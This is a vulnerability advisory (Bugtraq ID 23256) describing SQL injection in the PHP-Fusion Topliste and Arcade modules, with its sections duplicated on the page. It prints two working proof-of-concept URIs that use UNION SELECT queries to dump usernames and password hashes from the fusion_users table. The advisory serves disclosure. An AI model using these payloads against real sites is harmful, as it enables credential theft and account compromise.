PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
BID:23256
Info
PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
| Bugtraq ID: | 23256 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 02 2007 12:00AM |
| Updated: | Apr 03 2007 05:02PM |
| Credit: | xoron is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHP-Fusion Topliste 1.0 PHP-Fusion Arcade Module 1.0 |
| Not Vulnerable: | |
Discussion
PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
Multiple PHP-FUSION modules are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Multiple PHP-FUSION modules are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Exploit / POC
PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available.
http://www.example.com/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
http://www.example.com/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available.
http://www.example.com/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
http://www.example.com/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
Solution / Fix
PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
PHP-Fusion Multiple Modules Index.PHP SQL Injection Vulnerabilities
References:
References:
- PHP-Fusion Homepage (PHP-Fusion)